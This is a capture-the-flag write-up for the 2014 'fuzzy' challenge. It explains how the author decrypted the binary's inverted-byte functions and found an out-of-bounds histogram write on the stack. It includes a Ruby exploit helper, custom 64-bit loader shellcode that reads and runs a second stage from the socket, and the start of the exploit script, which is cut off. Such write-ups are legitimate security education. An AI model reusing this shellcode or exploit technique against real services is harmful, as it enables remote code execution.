Ghost in the Shellcode: fuzzy (Pwnage 301)

Hey folks,

It’s a little bit late coming, but this is my writeup for the Fuzzy level from the Ghost in the Shellcode 2014 CTF! I kept putting off writing this, to the point where it became hard to just sit down and do it. But I really wanted to finish before PlaidCTF 2014, which is this weekend, so here we are! You can see my other two writeups here (TI-1337) and here (gitsmsg).

Like my other writeups, this is a “pwnage” level, and required the user to own a remote server. Unfortunately, because of my slowness, they’re no longer running the server, but you can get a copy of the binary at my github page and run it yourself. It’s a 64-bit Linux ELF executable. It didn’t have ASLR, and DEP would have been

The setup

The service itself was a fairly simple text-parsing application (it calls itself a “parsing engine”), the kind you might make in a Computer Science 101 course. For example:

$ nc -vv localhost 4141
localhost [127.0.0.1] 4141 (?) open
Welcome to the super secure parsing engine!
Please select a parser!

1) Sentence histogram
2) Sorted characters (ascending)
3) Sorted characters (decending)
4) Sorted ints (ascending)
5) Sorted ints (decending
6) global_find numbers in string
2
Enter a series of characters to check if it's sorted
This is a test string
is NOT sorted

Or the histogram function:

$ nc -vv localhost 4141
localhost [127.0.0.1] 4141 (?) open
Welcome to the super secure parsing engine!
Please select a parser!

1) Sentence histogram
2) Sorted characters (ascending)
3) Sorted characters (decending)
4) Sorted ints (ascending)
5) Sorted ints (decending
6) global_find numbers in string
1
Enter a series of characters
This is histrogram
 :2     !:0     ":0     #:0     $:0
 %:0     &:0     ':0     (:0     ):0
 *:0     +:0     ,:0     -:0     .:0
 /:0     0:0     1:0     2:0     3:0
 4:0     5:0     6:0     7:0     8:0
 9:0     ::0     ;:0     <:0     =:0
 >:0     ?:0     @:0     A:0     B:0
 C:0     D:0     E:0     F:0     G:0
 H:0     I:0     J:0     K:0     L:0
 M:0     N:0     O:0     P:0     Q:0
 R:0     S:0     T:1     U:0     V:0
 W:0     X:0     Y:0     Z:0     [:0
 \:0     ]:0     ^:0     _:0     `:0
 a:1     b:0     c:0     d:0     e:0
 f:0     g:1     h:2     i:3     j:0
 k:0     l:0     m:1     n:0     o:1
 p:0     q:0     r:2     s:3     t:1
 u:0     v:0     w:0     x:0     y:0
 z:0     {:0     |:0     }:0

Straightforward!

Code security

The blurb for the application mentioned their unbreakable security wrapper. Sounds interesting, but what does that even mean? Well, if you open up the code in IDA and poke around a bit, you’ll find that after opening a socket and accepting a connection, it forks and calls handleConnection():

.text:004014C1 handleConnection proc near              ; DATA XREF: main+3Bo
.text:004014C1
.text:004014C1 var_4           = dword ptr -4
.text:004014C1
.text:004014C1                 push    rbp
.text:004014C2                 mov     rbp, rsp
.text:004014C5                 sub     rsp, 10h
.text:004014C9                 mov     [rbp+var_4], edi ; var_4 = socket
.text:004014CC                 mov     eax, 0
.text:004014D1                 call    initFunctions   ; Store pointers to a bunch of functions
.text:004014D6                 mov     eax, [rbp+var_4]
.text:004014D9                 mov     dword ptr cs:global_f+48h, eax
.text:004014DF                 mov     rax, qword ptr cs:global_f+20h ; rax = callFunction
.text:004014E6                 mov     rdx, qword ptr cs:global_f+68h ; rdx = intro
.text:004014ED                 lea     rcx, [rbp+var_4]
.text:004014F1                 mov     rsi, rcx        ; socket
.text:004014F4                 mov     rdi, rdx        ; function
.text:004014F7                 call    rax             ; callFunction
.text:004014F9                 mov     eax, 0
.text:004014FE                 leave
.text:004014FF                 retn

initFunctions() looks like this:

.text:00401627 initFunctions   proc near               ; CODE XREF: handleConnection+10h
.text:00401627                 push    rbp
.text:00401628                 mov     rbp, rsp
.text:0040162B                 mov     qword ptr cs:global_f, offset _puts
.text:00401636                 mov     qword ptr cs:global_f+8, offset _getchar
.text:00401641                 mov     qword ptr cs:global_f+10h, offset _send
.text:0040164C                 mov     qword ptr cs:global_f+18h, offset _recv
.text:00401657                 mov     qword ptr cs:global_f+20h, offset callFunction
.text:00401662                 mov     qword ptr cs:global_f+28h, offset _strlen
.text:0040166D                 mov     qword ptr cs:global_f+30h, offset _memset
.text:00401678                 mov     qword ptr cs:global_f+38h, offset _sprintf
.text:00401683                 mov     qword ptr cs:global_f+40h, offset _atoi
.text:0040168E                 mov     qword ptr cs:global_f+50h, offset my_sendAll
.text:00401699                 mov     qword ptr cs:global_f+58h, offset my_readAll
.text:004016A4                 mov     qword ptr cs:global_f+60h, offset my_readUntil
.text:004016AF                 mov     qword ptr cs:global_f+68h, offset intro
...and so on.

Thankfully, there are symbols! There might be one or two that I named, but the rest were all symbols that were embedded into the executable. I actually made a struct in IDA that had all the functions listed with their offsets from global_f, which made it easy to see what was being called later.
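Here is a minimal Ruby sketch of the same idea as that IDA struct: a lookup from offsets to slot names, filled in only from the initFunctions() listing above plus the socket slot at +0x48 that handleConnection() writes. `GLOBAL_F_SLOTS` and `global_f_slot` are hypothetical names, and the real table has more entries than shown.

```ruby
# Hypothetical model of the global_f table: offset from global_f => what lives there.
# Entries come from the initFunctions() listing; the real table is longer.
GLOBAL_F_SLOTS = {
  0x00 => "puts",
  0x08 => "getchar",
  0x10 => "send",
  0x18 => "recv",
  0x20 => "callFunction",
  0x28 => "strlen",
  0x30 => "memset",
  0x38 => "sprintf",
  0x40 => "atoi",
  0x48 => "socket (int, stored by handleConnection)",
  0x50 => "my_sendAll",
  0x58 => "my_readAll",
  0x60 => "my_readUntil",
  0x68 => "intro"
}.freeze

# Translate an IDA operand such as "qword ptr cs:global_f+68h" into a slot name.
# IDA writes hex offsets with an "h" suffix and small ones (like +8) without it.
def global_f_slot(operand)
  match = operand.match(/global_f(?:\+(\h+)(h)?)?/)
  raise ArgumentError, "not a global_f operand: #{operand}" unless match
  offset =
    if match[1].nil? then 0
    elsif match[2] then match[1].to_i(16)
    else match[1].to_i
    end
  GLOBAL_F_SLOTS.fetch(offset, format("unknown (+0x%x)", offset))
end

puts global_f_slot("qword ptr cs:global_f+20h") # => callFunction
puts global_f_slot("qword ptr cs:global_f+8")   # => getchar
```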

The functions themselves pointed to what looks like encrypted/compressed code:

.data:006034E0 isSorted        db 0AAh, 0B7h, 76h, 1Ah, 0B7h, 7Eh, 13h, 8Fh, 0FEh, 2 dup(0FFh)
.data:006034E0                                         ; DATA XREF: initFunctions+9Eo
.data:006034E0                 db 0B7h, 76h, 42h, 67h, 1, 2 dup(0), 9Bh, 0B7h, 74h, 0FBh
.data:006034E0                 db 0DAh, 0D7h, 3 dup(0FFh), 0B7h, 76h, 0BAh, 7, 0CEh, 3Fh
.data:006034E0                 db 0B7h, 74h, 7Ah, 67h, 1, 2 dup(0), 74h, 0BFh, 0B7h, 76h
.data:006034E0                 db 7Ah, 4Fh, 1, 2 dup(0), 0B7h, 74h, 7Ah, 67h, 1, 2 dup(0
...

So, almost every function is obscured in some way. I can work with this!

In the handleConnection() function, the only call after initFunctions() is:

.text:004014DF                 mov     rax, qword ptr cs:global_f+20h ; rax = callFunction
.text:004014E6                 mov     rdx, qword ptr cs:global_f+68h ; rdx = intro
.text:004014ED                 lea     rcx, [rbp+var_4]
.text:004014F1                 mov     rsi, rcx        ; socket
.text:004014F4                 mov     rdi, rdx        ; function
.text:004014F7                 call    rax             ; callFunction

Let’s have a look at callFunction() (I’ll shorten this to just the super important stuff, grab the file from github if you want a complete listing):

.text:004015BB                 mov     edx, 7          ; prot
.text:004015C0                 mov     esi, 514h       ; len
.text:004015CA                 call    _mmap           ; Allocate executable memory
.text:004015DB                 mov     edx, 514h       ; n
.text:004015E0                 mov     rsi, rcx        ; src = the encrypted memory
.text:004015E3                 mov     rdi, rax        ; dest = the allocated memory
.text:004015E6                 call    _memcpy
.text:004015EF                 mov     rdi, rax        ; data = allocated memory
.text:004015F2                 call    decryptFunction
.text:0040160C                 call    rdx             ; the allocated memory
.text:0040161A                 mov     rdi, rax        ; the allocated memory
.text:0040161D                 call    _munmap
.text:00401626                 retn

Basically, allocate 0x514 bytes, copy the encrypted code into it, decrypt it, run it, unmap it.

The last step is to look at decryptFunction() - once again, I’m going to leave out unimportant lines:

.text:0040151A loop_top:                               ; CODE XREF: decryptFunction+90j
.text:00401534                 movzx   edx, byte ptr [rdx] ; edx = current character
.text:00401537                 not     edx             ; edx = current character inverted
.text:00401539                 mov     [rax], dl       ; invert the current character
.text:00401583                 movzx   eax, byte ptr [rax] ; eax -> current byte
.text:00401586                 cmp     al, 0C3h        ; Stop if we reach a 'ret'
.text:00401588                 jnz     short loop_bottom
.text:0040158A                 jmp     short done
.text:0040158C ; ---------------------------------------------------------------------------
.text:0040158C
.text:0040158C loop_bottom:                            ; CODE XREF: decryptFunction+6Ej
.text:0040158C                                         ; decryptFunction+74j ...
.text:0040158C                 add     [rbp+counter], 1
.text:00401590                 jmp     short loop_top
.text:00401592 ; ---------------------------------------------------------------------------
.text:00401592
.text:00401592 done:                                   ; CODE XREF: decryptFunction+8Aj
.text:00401592                 mov     eax, [rbp+counter]
.text:00401595                 add     eax, 1
.text:00401598                 leave
.text:00401599                 retn

Effectively, this inverts every byte until it reaches a return (0xC3), which is the same as XORing each byte with 0xFF. One thing I don’t show here is that it won’t stop until it has also seen a sequence of five NOPs (the code was a little complicated, and I didn’t want to get lost in the details).
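To make the loop concrete, here is a hedged Ruby model of decryptFunction(). It assumes the loop stops at the first decrypted 0xC3 that comes right after at least five decrypted NOPs; the exact rule is only paraphrased above (the exploit’s own comment guesses six), so `MIN_NOPS` is a guess, and `decrypt_function`/`encrypt_function` are hypothetical names.

```ruby
NOP = 0x90
RET = 0xC3
MIN_NOPS = 5 # assumption: NOPs required before the terminating ret

# Invert bytes one at a time (same as XOR 0xFF) until a decrypted ret that
# follows at least MIN_NOPS decrypted NOPs. Returns the decrypted bytes,
# including that ret, and ignores anything after it.
def decrypt_function(encrypted)
  out = []
  nops = 0
  encrypted.each_byte do |b|
    plain = ~b & 0xFF # the 'not' instruction, truncated to one byte
    out << plain
    return out.pack("C*") if plain == RET && nops >= MIN_NOPS
    nops = plain == NOP ? nops + 1 : 0
  end
  raise ArgumentError, "no terminator found"
end

# Encoding is the same operation: invert every byte.
def encrypt_function(code)
  code.bytes.map { |b| b ^ 0xFF }.pack("C*")
end
```

A lone 0xC3 inside a function body does not end the loop under this model; only one preceded by the NOP run does, which is why the exploit appends NOPs and a `ret` to its shellcode.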

To summarize this section, there is a global table that holds pointers to functions that are encrypted by inverting all bits. The table is initialized in initFunctions(), and the functions are accessed using callFunction(). When callFunction() is called, the function is decrypted into some freshly allocated memory, run, then the memory is freed. So if we can get our own encrypted code into the right place...

Decrypting

To make reversing easier, I wrote a quick ruby script that will decrypt the functions in place:

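# Read the first 33183 bytes of the binary; binary mode keeps Ruby from
# treating the high bytes as text
fuzzy = File.binread("fuzzy", 33183)

puts(fuzzy.length)

# Find the start of the encrypted functions
start = fuzzy.index("\xAA\xB7\x76\x1A\xB7\x7C\x13\xDF".b)
puts("start = %x" % start)

# Invert every byte of the encrypted region (0x6041E0 - 0x602160 bytes long)
start.upto(start + 0x6041E0 - 0x602160 - 1) do |i|
  fuzzy[i] = (fuzzy[i].ord ^ 0xFF).chr
end

File.binwrite("fuzzy-decrypted", fuzzy)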

The output file is fuzzy-decrypted, which you can find on the github repository. fuzzy-decrypted.i64 contains the majority of my comments.

This version of the executable won’t run, of course, because it tries to decrypt the already-decrypted data. The easy fix would be to remove the single ‘not’ instruction, and everything else would work as expected. I didn’t think of that at the time, however, and NOPed out the entire decryption portion. Here is a diff I generated with objdump + diff; note that the syntax will be slightly different from IDA’s:

 0040159a <callFunction>:
-  40159a:      55                      push   rbp
-  40159b:      48 89 e5                mov    rbp,rsp
-  40159e:      48 83 ec 20             sub    rsp,0x20
-  4015a2:      48 89 7d e8             mov    QWORD PTR [rbp-0x18],rdi
-  4015a6:      48 89 75 e0             mov    QWORD PTR [rbp-0x20],rsi
+  40159a:      48 89 f8                mov    rax,rdi
+  40159d:      bf e0 47 60 00          mov    edi,0x6047e0
+  4015a2:      ff d0                   call   rax
+  4015a4:      c3                      ret
+  4015a5:      90                      nop
+  4015a6:      48 89 7d e8             mov    QWORD PTR [rbp-0x18],rdi
   4015aa:      41 b9 00 00 00 00       mov    r9d,0x0
   4015b0:      41 b8 ff ff ff ff       mov    r8d,0xffffffff
   4015b6:      b9 22 00 00 00          mov    ecx,0x22

Basically, I replaced the function’s prologue with a direct call to the (already decrypted) function, followed by a ret, so the mmap/decrypt code after it never runs.
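Patches like this one can be applied with a few lines of Ruby. This sketch assumes the usual non-PIE layout where the first loadable segment maps file offset 0 to 0x400000, so a .text address becomes a file offset by subtracting 0x400000; check the program headers (for example with `readelf -l`) before trusting that. `TEXT_BASE`, `CALLFUNCTION_STUB` and `patch_at` are hypothetical names, and the stub only covers the bytes from 0x40159a through the nop at 0x4015a5 in the diff above (the line at 0x4015a6 sits after the ret and never executes).

```ruby
TEXT_BASE = 0x400000 # assumption: vaddr 0x400000 <=> file offset 0

# New start of callFunction, copied from the diff:
#   mov rax, rdi ; mov edi, 0x6047e0 ; call rax ; ret ; nop
CALLFUNCTION_STUB = [0x48, 0x89, 0xf8,
                     0xbf, 0xe0, 0x47, 0x60, 0x00,
                     0xff, 0xd0,
                     0xc3,
                     0x90].pack("C*")

# Overwrite bytes in an in-memory copy of the binary at a virtual address.
def patch_at(image, vaddr, bytes)
  offset = vaddr - TEXT_BASE
  if offset.negative? || offset + bytes.bytesize > image.bytesize
    raise ArgumentError, format("0x%x is outside the image", vaddr)
  end
  image[offset, bytes.bytesize] = bytes
  image
end

# Usage (not run here):
#   image = File.binread("fuzzy-decrypted")
#   patch_at(image, 0x40159a, CALLFUNCTION_STUB)
#   File.binwrite("fuzzy-decrypted-fixed", image)
```

The same helper works for the fork()/alarm() changes below: each is a same-length overwrite of a 5-byte `call rel32`.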

The final change I made to the executable was to disable the calls to fork() and alarm(), as I discussed in previous posts. In the objdump diff, it looks like this:

   401098:      83 7d f4 ff             cmp    DWORD PTR [rbp-0xc],0xffffffff
   40109c:      75 02                   jne    4010a0 <loop+0x3d>
   40109e:      eb 65                   jmp    401105 <loop+0xa2>
-  4010a0:      e8 fb fc ff ff          call   400da0 <fork@plt>
+  4010a0:      48 31 c0                xor    rax,rax
+  4010a3:      90                      nop
+  4010a4:      90                      nop
   4010a5:      89 45 f8                mov    DWORD PTR [rbp-0x8],eax
   4010a8:      83 7d f8 ff             cmp    DWORD PTR [rbp-0x8],0xffffffff
   4010ac:      75 02                   jne    4010b0 <loop+0x4d>
@@ -1220,7 +1222,11 @@
   4010b0:      83 7d f8 00             cmp    DWORD PTR [rbp-0x8],0x0
   4010b4:      75 45                   jne    4010fb <loop+0x98>
   4010b6:      bf 1e 00 00 00          mov    edi,0x1e
-  4010bb:      e8 b0 fb ff ff          call   400c70 <alarm@plt>
+  4010bb:      90                      nop
+  4010bc:      90                      nop
+  4010bd:      90                      nop
+  4010be:      90                      nop
+  4010bf:      90                      nop
   4010c0:      48 8b 05 89 10 20 00    mov    rax,QWORD PTR [rip+0x201089]        # 602150 <USER>
   4010c7:      48 89 c7                mov    rdi,rax
   4010ca:      e8 43 00 00 00          call   401112 <drop_privs_user>
@@ -1584,11 +1590,12 @@
   401599:      c3                      ret

The file, with everything decrypted, can be found under fuzzy-decrypted-fixed on github.

The vulnerability

In spite of the name - fuzzy - implying that I should probably fuzz, I decided that now that I had the code decrypted I would just look for the vuln manually. I’m also a contrarian, which these days people are calling “first world anarchists”. You can’t tell ME what to do! :)

Anyway, I decided to reverse the 6 different parsers in a completely random and arbitrary order, based on what looked easiest to understand. As a reminder, here are the possible parsers:

1) Sentence histogram
2) Sorted characters (ascending)
3) Sorted characters (decending)
4) Sorted ints (ascending)
5) Sorted ints (decending
6) global_find numbers in string

I won’t go into details of the ones that weren’t vulnerable; instead, we’ll look at the first one, Sentence Histogram. Sentence Histogram calls charHistogram(), which is a rather long function. Essentially, it creates an array of bytes, with one array entry per character, then loops through the string and increments the entry for each character. Something like:

unsigned char counts[0x80];
for(i = 0; i < strlen(input); i++) {
  counts[(unsigned char)input[i]]++; /* no bounds check: the index can be anything up to 0xFF */
}

Here’s the actual code, abridged:

.data:006031DD                 movzx   eax, byte ptr [rax] ; eax = current_character
.data:006031E0                 movzx   eax, al
.data:006031E3                 movsxd  rdx, eax
.data:006031E6                 movzx   edx, [rbp+rdx+buffer_88_bytes] ; edx = buffer_88_bytes[current_character]
.data:006031EE                 add     edx, 1          ; Increment that index in the 88-byte buffer
.data:006031F1                 cdqe
.data:006031F3                 mov     [rbp+rax+buffer_88_bytes], dl ; <--- VULN
.data:006031FA                 add     [rbp+counter], 1

Due to a lack of input validation, if your string contains bytes with a value of at least 0x88 (‘\x88’), you can increment not only values in the actual array, but values stored up to 0xFF bytes from the start of the array. Oops! Since the array happens to be on the stack, we can control the entire stack frame, to an extent (unfortunately, we only get a couple hundred characters, so we can’t, for example, change all bytes of a 64-bit pointer in a meaningful way).
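A small Ruby model makes the out-of-bounds write concrete. It treats the stack as a flat 0x100-byte window starting at the count array and borrows the offsets from the exploit at the end of this post (saved rbp at +0x90, return address at +0x98); those offsets and the name `histogram_window` are assumptions of the model, not something read from the binary here.

```ruby
SAVED_RBP_OFFSET = 0x90 # FP_ADDR - BASE_VULN_ARRAY in the exploit
RETURN_OFFSET    = 0x98 # RETURN_ADDR - BASE_VULN_ARRAY in the exploit

# Model of charHistogram(): each input byte indexes the count array directly,
# with no bounds check, and the count is stored back as a single byte.
def histogram_window(input, window)
  input.each_byte do |b|
    window[b] = (window[b] + 1) & 0xFF # byte-sized increment, no carry
  end
  window
end

# Put a little-endian return address of 0x40160E into the window.
window = Array.new(0x100, 0)
[0x40160E].pack("Q<").bytes.each_with_index { |v, i| window[RETURN_OFFSET + i] = v }

histogram_window("\x98".b * 3, window) # three 0x98 bytes bump the low byte
ret = window[RETURN_OFFSET, 8].pack("C*").unpack1("Q<")
puts format("0x%x", ret) # => 0x401611
```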

Madness lies here

It’s been a couple months since I did this, and details for the next few hours of work are fuzzy. I spent a lot of time - probably in the realm of 8 hours or more - trying to figure out what to increment before I noticed this code at the end of charHistogram():

.data:006034BE locret_6034BE:                          ; CODE XREF: charHistogram+357j
.data:006034BE                 leave
.data:006034BF                 retn

I was in the habit of ignoring ‘leave’, and didn’t really think about it. D’oh! The ‘leave’ instruction (equivalent to mov rsp, rbp; pop rbp) restores the caller’s rbp from the copy saved on the stack (which we control!), then ‘ret’, of course, returns to the address on the stack (which we also control). Aha!
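A toy Ruby model shows why those two stack slots are enough. Memory is a Hash of 8-byte slots and registers are Hash keys, so this is a simplification rather than an emulator. The values are the ones the exploit aims for: FP_ADDR as the frame base, the return address at FP_ADDR + 8, and DESIRED_FP with IS_REAL_TARGET = 1.

```ruby
# leave == mov rsp, rbp ; pop rbp
# ret   == pop rip
def leave_ret(regs, mem)
  regs[:rsp] = regs[:rbp]
  regs[:rbp] = mem.fetch(regs[:rsp]) # saved rbp, right at the frame base
  regs[:rsp] += 8
  regs[:rip] = mem.fetch(regs[:rsp]) # return address, one slot above it
  regs[:rsp] += 8
  regs
end

frame_base = 0x7fffffffdf80
mem = {
  frame_base     => 0x7fffffffe020, # saved rbp after our increments
  frame_base + 8 => 0x4015AA        # return address after our increments
}
regs = leave_ret({ rbp: frame_base, rsp: frame_base - 0x90 }, mem)
# regs[:rip] is now 0x4015AA and regs[:rbp] is 0x7fffffffe020
```

After the `ret`, execution continues at 0x4015AA with a frame pointer of our choosing, and every `[rbp+...]` access there reads from wherever we pointed it.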

For an attack, we can modify both the frame pointer - changing how we address local variables - and the return address. Let’s see how!

The attack

As I mentioned, I wanted to change the return address. Specifically, I wanted to change it from 0x40160E (the normal return address) to 0x4015AA. The reason I want it to be 0x4015AA is because at that address, this code is found:

.text:004015AA                 mov     r9d, 0          ; offset
.text:004015B0                 mov     r8d, 0FFFFFFFFh ; fd
.text:004015B6                 mov     ecx, 22h        ; flags
.text:004015BB                 mov     edx, 7          ; prot
.text:004015C0                 mov     esi, 514h       ; len
.text:004015C5                 mov     edi, 0          ; addr
.text:004015CA                 call    _mmap
.text:004015CF                 mov     [rbp+addr], rax
.text:004015D3                 mov     rcx, [rbp+src]
.text:004015D7                 mov     rax, [rbp+addr]
.text:004015DB                 mov     edx, 514h       ; n
.text:004015E0                 mov     rsi, rcx        ; src
.text:004015E3                 mov     rdi, rax        ; dest
.text:004015E6                 call    _memcpy
.text:004015EB                 mov     rax, [rbp+addr]
.text:004015EF                 mov     rdi, rax
.text:004015F2                 call    decryptFunction
.text:004015F7                 mov     rdx, [rbp+addr]
.text:004015FB                 mov     rax, [rbp+var_20]
.text:004015FF                 mov     rsi, rax
.text:00401602                 mov     edi, offset global_f
.text:00401607                 mov     eax, 0
.text:0040160C                 call    rdx

This allocates memory, copies code into it (from a pointer read relative to rbp, the frame pointer, which, as I eventually realized, we control!), decrypts it, and runs it. If we can change the return address to that line, and change rbp just enough that [rbp+src] points to memory we control, we’re home free!

Now, to change 0x40160E (the normal return address) to 0x4015AA (the address I want), I had to increment the lowest byte 0x9C times (0xAA - 0x0E), and the second-lowest byte 0xFF times: there is no carry between bytes, so 0x16 has to wrap all the way around to reach 0x15. I wrote a function called edit_memory() that would essentially do the math for me and increment the proper bytes:

def edit_memory(from, to, location)
  # Handle each of the 8 bytes, though in practice I think we only needed
  # the first two
  0.upto(7) do |i|
    # Get the before and after values for the current byte
    from_i = (from >> (8 * i)) & 0xFF
    to_i   = (to   >> (8 * i)) & 0xFF

    # As long as the bytes are different, add the current 'increment' character
    while(from_i != to_i) do
      # If we already have the location from the shellcode or something, don't
      # repeat it
      if(!@@used_chars[location+i].nil? && @@used_chars[location+i] > 0)
        $stderr.puts("Saved a character!")
        @@used_chars[location+i] -= 1
      else
        my_print((location+i).chr)
      end

      # Increment as a byte
      from_i = (from_i + 1) & 0xFF
    end
  end
end
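The per-byte cost is easy to check separately. This hypothetical `increments_needed` helper mirrors the inner loop of edit_memory() without printing anything: each byte wraps at 0x100 with no carry, so a byte needs (to - from) mod 0x100 input characters.

```ruby
# Number of single-byte increments needed to turn each byte of `from`
# into the matching byte of `to` (little-endian, 8 bytes, no carry).
def increments_needed(from, to)
  (0...8).map do |i|
    from_i = (from >> (8 * i)) & 0xFF
    to_i   = (to   >> (8 * i)) & 0xFF
    (to_i - from_i) % 0x100
  end
end

counts = increments_needed(0x40160E, 0x4015AA)
p counts     # => [156, 255, 0, 0, 0, 0, 0, 0]
p counts.sum # => 411
```

So the return-address edit alone costs 411 characters of input (minus any that the shellcode already supplies), which is why the size of these edits matters.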

One unfortunate issue that I ran into is that the frame pointer - rbp - was slightly different on my test system than on the eventual production system. I ended up writing a small brute forcer that would attempt to run the shellcode “\xeb\xfe” (a jump to itself) over and over, with slightly different rbp values, until the server finally stopped responding, telling me that the infinite loop was running. That was ugly, but it worked well in the end!
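The brute forcer itself isn’t in this post, so the following is only a hedged Ruby sketch of the idea. For each candidate frame pointer it builds a payload whose stage-one code is `\xeb\xfe`, sends it, and treats a connection that is still open after a timeout as a hit. `build_payload` is a hypothetical callable standing in for the exploit’s payload generation. The 8-byte step and the timeouts are guesses, although the exploit’s `7 * 8` adjustment suggests an 8-byte step.

```ruby
require "socket"

# Send `payload`, then keep draining output until either the connection
# closes (the child crashed or exited: wrong guess) or `timeout` seconds pass
# with it still open (assumed to mean the \xeb\xfe loop is spinning).
def hangs?(host, port, payload, timeout: 5)
  Socket.tcp(host, port, connect_timeout: 5) do |sock|
    sock.write(payload)
    deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + timeout
    loop do
      remaining = deadline - Process.clock_gettime(Process::CLOCK_MONOTONIC)
      return true if remaining <= 0
      sock.readpartial(4096) if IO.select([sock], nil, nil, remaining)
    end
  end
rescue EOFError, Errno::ECONNRESET
  false
end

# Walk candidate frame pointers upward in 8-byte steps and return the first
# one the probe block reports as a hang, or nil if none does.
def find_frame_pointer(base_fp, tries, build_payload)
  tries.times do |n|
    fp = base_fp + 8 * n
    return fp if yield(build_payload.call(fp))
  end
  nil
end

# Usage (not run here):
#   fp = find_frame_pointer(0x7fffffffdfe8, 16, builder) do |line|
#     hangs?("target", 4141, line)
#   end
```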

Shellcode

That all sounds pretty straightforward, but there was a catch: I decided to point [rbp+src] to the beginning of the character array that’s fed into the histogram. That may sound good, since I control that memory in full, but the catch is that any character of 0x88 or higher has a chance of modifying an important stack value, which means all the shellcode I could find would simply corrupt the stack and crash. D’oh! It also had to be encoded, since the code is decoded (XORed with 0xFF) before being run, but that’s easy.
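Both constraints can be checked before sending anything. This hypothetical `check_stage1` helper encodes a byte string the same way (XOR 0xFF) and reports encoded bytes that are a newline or that land on a sensitive stack offset. The default danger zone, 0x90 through 0x9F, is an assumption taken from the exploit’s FP_OFFSET and RETURN_OFFSET (saved rbp and return address); the real set of sensitive offsets may be larger. The exploit itself takes a softer approach and credits such bytes toward edit_memory() via `@@used_chars`.

```ruby
DANGER_ZONE = (0x90..0x9F) # assumed: saved rbp (+0x90) and return address (+0x98)

# Returns a list of problems with `code` once it is XOR-encoded with 0xFF.
def check_stage1(code, danger: DANGER_ZONE)
  problems = []
  code.each_byte.with_index do |b, i|
    enc = b ^ 0xFF
    problems << format("byte %d encodes to 0x0a (newline)", i) if enc == 0x0A
    problems << format("byte %d encodes to 0x%02x (stack offset)", i, enc) if danger.cover?(enc)
  end
  problems
end

p check_stage1("\x90\x90\xc3".b) # => []
p check_stage1("\x60\xf5".b)     # 0x60 -> 0x9f (stack offset), 0xf5 -> 0x0a (newline)
```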

I spent a lot of time writing code that would basically read a file off the remote filesystem. After a couple hours of carefully crafting shellcode, I finally got it working and realized that the filename wasn’t the same filename used in the previous two levels. I had no idea which file to read! As a result, I needed full-on shellcode that would exec a shell.

After another couple hours trying to get exec to work without crashing, I gave up that approach, and decided to write a loader instead. A loader can be shorter and simpler, but can run any arbitrary code.

Three custom shellcodes later, I had both working shellcode and a fairly good understanding of 64-bit shellcoding, which isn’t bad considering I had never written 64-bit assembly before this! :)

Here’s what I ended up coming up with:

# Encode the custom-written loader code that basically reads from the
# socket into some allocated memory, then runs it.
#
# Trivia: This is my first 64-bit shellcode! :)
#
# This had to be carefully constructed because it would influence the
# eventual histogram, which would modify the stack and therefore break
# everything.
my_print(encode_shellcode(

  "\xb8\x09\x00\x00\x00"     + # mov eax, 9 (mmap)
  "\xbf\x00\x00\x00\x41"     + # mov edi, 0x41000000 (addr)
  "\xbe\x00\x10\x00\x00"     + # mov esi, 0x1000 (size)
  "\xba\x07\x00\x00\x00"     + # mov edx, 7 (prot = RWX)
  "\x41\xba\x32\x00\x00\x00" + # mov r10d, 0x32 (flags = MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED)
  "\x41\xb8\x00\x00\x00\x00" + # mov r8d, 0 (fd)
  "\x41\xb9\x00\x00\x00\x00" + # mov r9d, 0 (offset)
  "\x0f\x05"                 + # syscall - mmap

  "\xbf\x98\xf8\xd0\xb0"     + # mov edi, ptr to socket ^ 0xb0b0b0b0
  "\x81\xf7\xb0\xb0\xb0\xb0" + # xor edi, 0xb0b0b0b0
  "\x48\x8b\x3f"             + # mov rdi, [rdi]

  "\xb8\x00\x00\x00\x00"     + # mov eax, 0 (read)
  "\xbe\x00\x00\x00\x41"     + # mov esi, 0x41000000 (buf)
  "\xba\x00\x20\x00\x00"     + # mov edx, 0x2000 (count)
  "\x0f\x05"                 + # syscall - read
  "\x56\xc3"                 + # push rsi / ret (jump to the buffer)
  "\xc3"                     + # ret

  "\xcd\x03" # int 3
))

Basically, this calls mmap() to allocate a page of memory at a fixed address (0x41000000), reads the actual socket descriptor from a global variable, reads data from the socket into that memory, then jumps to the start of it. Now I can send a shell payload I found online as a second stage without worrying about input restrictions!
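The odd-looking `mov edi` / `xor edi` pair can be checked with a little arithmetic. The sketch below assumes global_f sits at 0x6047e0 (the constant the patched callFunction loads into edi) and that the socket lives at global_f+0x48 (where handleConnection() stores it). Under those assumptions, the plain address would encode to bytes that are all 0x88 or higher, while the XORed immediate encodes to bytes below 0x88. That appears to be the point of the trick, given the histogram constraint.

```ruby
GLOBAL_F_ADDR = 0x6047e0            # assumption: from `mov edi,0x6047e0` in the patch diff
SOCKET_PTR    = GLOBAL_F_ADDR + 0x48 # handleConnection stores the socket here
MASK          = 0xb0b0b0b0

imm = [SOCKET_PTR ^ MASK].pack("V") # 32-bit little-endian immediate for `mov edi, imm32`
p imm.bytes.map { |b| format("%02x", b) } # => ["98", "f8", "d0", "b0"]

encode = ->(s) { s.bytes.map { |b| b ^ 0xFF } }
p encode.call(imm).map { |b| format("%02x", b) }               # => ["67", "07", "2f", "4f"]
p encode.call([SOCKET_PTR].pack("V")).map { |b| format("%02x", b) } # => ["d7", "b7", "9f", "ff"]
```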

The exploit

I don’t think I chose the best possible way to attack this vulnerability. As I mentioned before, it required a small amount of bruteforcing to get offsets on the production server, which isn’t the cleanest. Here’s the exploit, in full, with comments. I’ve already explained the interesting bits:

# The base address of the vulnerable histogram array on the stack
# (Note: this can change based on the length that we sent! The rest doesn't appear to)
BASE_VULN_ARRAY = 0x7fffffffdf80-0x90

# The real target and my local target have different desired FP values
IS_REAL_TARGET = 1

# We want to edit the return address
RETURN_ADDR         = 0x7fffffffdf88  # Where the value we want to edit is
RETURN_OFFSET       = RETURN_ADDR - BASE_VULN_ARRAY
REAL_RETURN_ADDR    = 0x40160E
DESIRED_RETURN_ADDR = 0x4015AA

# And also edit the frame pointer
FP_ADDR         = 0x7fffffffdf80
FP_OFFSET       = FP_ADDR - BASE_VULN_ARRAY
REAL_FP         = 0x00007fffffffdfb0
DESIRED_FP      = 0x00007fffffffdfe8 + (7 * 8 * IS_REAL_TARGET)

# This global tracks which characters we use in our shellcode, to avoid
# influencing the histogram values for the important offsets
#
# (Top-level @@ variables like this one raise a RuntimeError on Ruby 3.0+;
# to run this on a modern Ruby, rename @@used_chars and @@n to $used_chars
# and $n.)
@@used_chars = []

